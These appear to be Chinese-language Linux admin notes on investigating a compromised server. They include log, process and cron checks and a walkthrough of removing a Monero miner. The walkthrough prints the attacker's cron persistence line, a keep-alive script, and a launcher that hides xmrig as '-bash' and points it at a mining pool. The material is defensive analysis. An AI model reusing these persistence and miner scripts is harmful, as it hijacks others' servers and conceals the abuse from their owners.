常用操作
yum
yum repolist all安装单机k8s
https://www.cnblogs.com/neutronman/p/8047547.html
服务器中招后排查
https://www.cnblogs.com/sparkdev/p/7694202.html
# 查看登录信息
vim /var/log/auth.log # 登录日志,可以查看到尝试登陆的用户名和ip等信息
last -f /var/log/btmp # 记录所有失败的登陆日志
last -u <userName>
last -f /var/log/wtmp # 登陆Ip,登陆时长
# 当前谁在线等信息
w
users
# 查看所有用户
vim /etc/passwd
history # 操作历史,登陆用户查看这个用户的操作历史
# 查看运行的进程
pstree -a # centos 用yum install psmisc
ps aux
# 查看网络情况
netstat -ntulp
# ufw屏蔽ip
ufw deny from 192.168.1.5 to any
# CPU内存
free -m
uptime
top
htop
# 还有空余的内存吗? 服务器是否正在内存和硬盘之间进行swap?
# 还有剩余的CPU吗? 服务器是几核的? 是否有某些CPU核负载过多了?
# 服务器最大的负载来自什么地方? 平均负载是多少?
for user in $(cat /etc/passwd | cut -f1 -d:); do crontab -l -u $user; done # 查看每个用户的定时任务
# 系统日志和内核消息
$ dmesg
$ less /var/log/messages
$ less /var/log/secure
$ less /var/log/auth在linux上发送http:POST请求
服务器负载太高,top命令查出异常进程ld-linux-x86_64,上网查果真有问题,
Tasks: 148 total, 2 running, 146 sleeping, 0 stopped, 0 zombie
%Cpu(s): 99.7 us, 0.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 32949020 total, 12146052 used, 20802968 free, 188664 buffers
KiB Swap: 7812092 total, 0 used, 7812092 free. 1615040 cached Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
30054 wocloud 20 0 9993904 8.809g 2632 S 333.0 28.0 102585:34 ld-linux-x86-64
11 root 20 0 0 0 0 S 0.3 0.0 8:14.07 rcuos/3
# 扫描出有异常定时任务
* * * * * /dev/shm/.ssh/upd >/dev/null 2>&1
# 进入相应用户删除异常定时任务
# 进入可疑文件目录/dev/shm/.ssh
vim /dev/shm/.ssh/upd
#!/bin/sh
# 保持进程存在的脚本
if test -r /dev/shm/.ssh/bash.pid; then # 如果bash.pid文件存在且可读,
pid=$(cat /dev/shm/.ssh/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)# -CHLD? >/dev/null 2>&1,将输出全部丢弃
then
sleep 1
else
cd /dev/shm/.ssh
./run &>/dev/null # 执行run脚本,并将输出丢弃
exit 0
fi
fi
#!/bin/bash
# 查看run脚本
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://ip:3333 钱包地址 -p x >>/dev/null & # 此ip是一个马来西亚ip,3333端口也几乎证明安装了xmrig-proxy,可以确定就是挖矿的了
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null & # 执行ld-linux-x86-64进程,然而环境变量指向的是xmrig这个挖矿木马
fi
echo $! > bash.pid
# 主要就是这些脚本
# clamav查杀病毒
clamscan -r / --move=/tmp
----------- SCAN SUMMARY -----------
Known viruses: 6165915
Engine version: 0.100.3
Scanned directories: 14709
Scanned files: 43249
Infected files: 6
Total errors: 16439
Data scanned: 1287.82 MB
Data read: 1496.12 MB (ratio 0.86:1)
Time: 1143.508 sec (19 m 3 s)
root@ubuntu:~# ll /tmp/
ls: 初始化月份字符串出错
总用量 13904
drwxrwxrwt 2 root root 4096 7▒▒ 4 16:07 ./
drwxr-xr-x 22 root root 4096 4▒▒ 24 2014 ../
-rw------- 1 root root 838583 7▒▒ 4 15:57 h64
-rw------- 1 root root 2735648 7▒▒ 4 15:57 libxmrstak_opencl_backend.so
-rwxr-xr-x 1 root root 2821872 3▒▒ 9 06:12 x.001*
-rw------- 1 root root 5200240 7▒▒ 4 15:57 xmrig
-rw------- 1 root root 2627088 7▒▒ 4 15:57 xmrig-notls
# 同时,stak目录下也有config.json文件,是开源的门罗币挖矿木马的配置文件,可以明显的看到ip,port,钱包地址等信息,可以确定是一个简单的门罗币挖矿木马了Tasks: 141 total, 4 running, 137 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.7 us, 11.8 sy, 0.0 ni, 87.3 id, 0.1 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 32949020 total, 638652 used, 32310368 free, 42468 buffers
KiB Swap: 7812092 total, 0 used, 7812092 free. 165852 cached Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
86 root 39 19 0 0 0 R 45.5 0.0 0:04.32 khugepaged
1314 clamav 20 0 269820 173048 7224 D 23.2 0.5 0:40.28 clamd服务器防护
Last updated